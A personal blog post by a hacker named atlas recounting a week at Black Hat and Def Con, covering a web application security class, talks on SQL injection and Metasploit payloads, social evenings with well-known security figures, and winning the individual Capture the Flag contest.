Black Hat and Def Con

Black Hat and Def Con! (by atlas)

Well, my friends. At last the week has come and gone. My family has done without me for 9 days, I've done without sleep for most of that, and my lips are swollen from desperately locking onto the firehose!

Web Application InSecurity

Starting out the week with NGS Software and Special Ops Security in the popular Web Application Software class. Two days was a little short for the original class, but it didn't lack. I was bored at first since they actually cover things as foreign to most developers as network topology and the security implications thereof. This has been my specialty for the past 4+ years.

I regained consiousness once we got started into the security aspects of web apps and server configs, though. Since these guys are pen-testers, not just security instructors their approach was refreshing, and took on much of the feel of an actual penetration test. I was rudely awakened by seemingly mundane things such as web server logging, when realizing how little useful information is logged by default when malicious code bangs it senseless. I guess I assumed that, but what I found intriguging was the settings to turn on valuable stuff!

Command Injection, SQL Injection, etc... It's all in there, and they didn't skimp on covering any of the good stuff. Each of the presenters were obviously accomplished in their field, and Chris Paget, the main instructor, even gave us a demo of his non-public time-based SQL injection tool, something that returns real data from the database server even when error messages are blocked by using time-based encoding. Very slick stuff indeed.

More on Chris later.

Drinking at BH/DC

I was fortunate enough to eat and drink with some of the greatest names in the security field, and that includes Mr. Paget. While checking into the hotel, a large man lumbers up behind me lugging some hefty computer equipment. I think my comment was "There can only be one reason you're here, what class are you taking?" He informed me that he was teaching Web App (In)Security. I laughed and introduced myself as being in his class the next day. When time came for him to meet friends and have a beer, I asked to accompany him. Little did I know who I would be drinking with. Great people (and names you'll recognize) such as David Litchfield (Jr. and Sr.), Marc Litchfield, Timothy Mullin, Eli O (whose card titles him "Grand Visier" of BH/DC), Erik Pace Birkholz and the rest of the SpecialOps (who co-taught the class), the rest of NGS, including Markus and Gunter, who is leaving NGS to take over technical leadership of another large company who has floundered in recent years (good luck to you Gunter!).

Overall they were great fun to hang out with and the conversations were very interesting, even of covering politics and faith. Ahhh, the wonders of alcohol and tobacco. Throughout the week I was also fortunate enough to drink with Mudge (who is very interesting and likeable), Simple Nomad, my dear friend Jay Beale (who has a nasty little Sushi habit!), Dan Kaminski, and many others who I leave off only for brevity, not unimportance. Indeed I've left out many who are very dear to my heart. Oh, what the hack! If you've reached your limit, skip this...

Greetz to Plato, Steven, Structure, Robb, individual, Toby and Amber!, Doc Brown and the Plan B crew, Jason, Darwin's Bastards (yo, guys!), TheArrogantSnit, Invisigoth, HackerJoe, Bob, Satori, Verbal, John, any other Kenshoto guys I may have missed, Nicole and Richard from NTO.

I must admit, however, that while being bold enough to converse with well-known people like they were normal people (a duh!) is great, I don't think some people are used to it. One person half way through the week asked me who the f*ck I was (I didn't take it badly, but it was curious). He said that when asked, everyone basically said that they thought I was *their* friend. When I asked if he thought me a social engineer, he said "Yes, exactly! not that that is necessarily a bad thing..." heh. Amusing times.

One of the highlights of the week was deep conversations with Chris Paget, particularly about weaknesses of current computer intelligence theory. Very unfortunately Chris had to leave early for personal reasons. He was definitely missed.

Another highlight had to be Microsoft's twin-parties. One at the Pure (Caesars Palace) and a followup at the Tangerine (Treasure Island). Not only did I get to meet and chat with awesome people, including HDMoore and Kevin Mitnick, but the night was topped off by watching Jay Beale and his unique and energetic dance moves! Heck, he even got *me* out on the dance floor.

Briefings

Wow, what a rush! First off, I've never seen so much alcohol on stage.

But beyond that, let's discuss the firehose I've been drinking!

Starting the morning off with David Litchfield discussing advanced SQL injection techniques, including time-based, as well as Oracle patching woes. Aside from some frustration over sound difficulties David was brilliant.

Mudge gave a talk on (what I think of as) basic-hacker-think... but the focus was on "functional fixation" and "learned immobility"... ie. who ever thought a plane could be a weapon!? Well, somebody did. The rest of us likely suffered from functional fixation. Short of a few meanderings not directly related to the topic Mudge proved he can handle lack of sleep and alcohol *very* well!

Spoonm and Skape from the MetaSploit Framework project were exceptional! The may have hit the basics of shellcoding a little too much for certain members of the crowd, but I can't say enough good things about the work they were detailing. I couldn't help but stick around afterward and catch the slides they felt compelled to skip to save time. Suffice it to say that Distributed Ninja and Meterpreter are payloads I will be learning in the near future. I did learn the unfortunate news that they will be forcing me to learn Ruby if I want to contribute (or read) Msf 3.0. I hear Ruby's great, but that's not a new theme for me (see Python/KenShoto later on). dN and Meterpretter are the next evolution of Syscall proxies, basically a snippit of code which accepts code from your system and executes it on the remote machine. Nothing is written to disk and Meterpretter even allows you to "migrate" which process they run in. dN runs on Linux, Meterpretter runs on Windows. They also clarified just what "stagers" are.

One of the stars of the show was definitely Johnny Long (johnny.ihackstuff.com). While I have a long history of appreciating Johnny, his speech was no let down. Particularly his wit when finding "googledorks". I really liked the comments about government findings ;) Buy Johnny's book. It's bound to be amusing and informative!

Not all Black Hat Briefings were as interesting to me. I attended one speaker who must have been a college professor (look and droning speech) who spoke on restricted computing environments, or sandboxes. While the potential impact was decent and the material could have been interesting (and he had *really cool* transitions in his preso), his presentation method lacked gusto and I was underwhelmed. Many folks didn't wait it out and left. I stuck around but to no avail.

DefCon

Yes, I know... I've already worn you out before getting to the good part. The truth is, I was so heads-down involved in the Capture the Flag (CTF) hacking competition that I don't have much to say.

The Kenshoto hacker group took over the CTF this year after the longstanding "Ghetto Hackers" hosts decided to retire. This being my first DefCon I can't speak to the transition. All I can say is that Kenshoto did an absolutely incredible job. There were some flubs along the way and yes, it cost me time, but overall I was so amazed at the complete package they put together, their thoroughness, that I can't even complain. They even included a feedback session afterwards so we could discuss how things turned out. I found it amusing that they did this prior to anyone learning who had won ;) Better that way, I think. What was so amazing?

From the moment I walked into the access-controlled room I felt like I was walking into a high-intensity playground/dance-club. Dim lights, technothrash music, the Black/Green color scheme, and the Blue siren-light all contributed to a feeling of greatness. The Kenshoto guys had their stuff together, even down to the green on black Kenshoto t-shirts which had different phrases each day...

Each night Caezar hosted parties which combined technogeeks with alcohol and saw amusing results. I was only able to catch two of the three parties, but the two I attended were pretty cool. Saturday I sat next to Dan Kaminski and a Microsoft employee and bash and posture and laugh until it hurt. That and discussions of Python being better than Perl (I'm not convinced yet), and of course watching Eli O dance while magically keeping two or three acryllic spheres afloat and tracing around his body-parts... they all contributed to a great time. Sunday's party was around pool 2 at the Alexis Park hotel, and enhanced by tossing a glow-stick inside the 1gallon juice jug filled with liquor-surprise... Tossing that around was probably more fun than the beach-balls. I got a chance to slow down and have a cool talk with Snit from Kenshoto, and ponder the impact of moving from my current address to the Virginia area. hmmmmm...... Tempting.

Falling asleep while _____ (version 2)

Well, I'm home now. After two hours sleep on Sunday, the plane rides were filled with the stuff. I intended to continue reversing CTF binaries, but alas that never happened. I just got around to that last night.

During the CTF Qualification round I found myself sleep-typing. At 5am it's amazing what the fingers have to say when you stop ordering them around and let their creative side show. "SegFailt os if it weren' groumedeor"

Well, since being home, I think I've topped it. I have actually fallen asleep while reading to my kids! "blah blah bla", he said............. <"daddy? Who said? Daddy???"> DOH!

Hopefully after some recovery I'll be able to better fit this new-found habit into my life without such extreme consequences.

By now, everyone is normally asking the question "How did you do at the CTF?" https://www.kenshoto.com/scores.html

Short and skinny? I didn't do nearly as well as I wished I had. And I won the individual (Ronin) contest, beating most of the teams.

Many thanks to those around me who I made alliances with, particularly the Darwin's Bastards, and of course my dear friend Plato, who very well could have beaten me. Greetz to the Shellphish and Sk3wl of R00t teams for a job very well done.

I won? and I'm not happy with that? Frankly, no. And it's not because I didn't beat the two top teams. It's about "my game" and no one else. I could have done more and done better and faster. I have much improvement to do this next year, and it can only come from more practice and better skillz. Why am I not happy? Because I resorted to lamer tactics of "low-hanging fruit" and social engineering rather than more challenging things. "Bottom line" is that I did what it took to win, but it's like playing defensive pool rather than simply shooting well. Next year I hope to run the table off the break.

Special nod to the friends I will keep out of this, especially Plato, Robb, Chris Paget, J-sLam, Snit and Invisigoth, drb and Toby.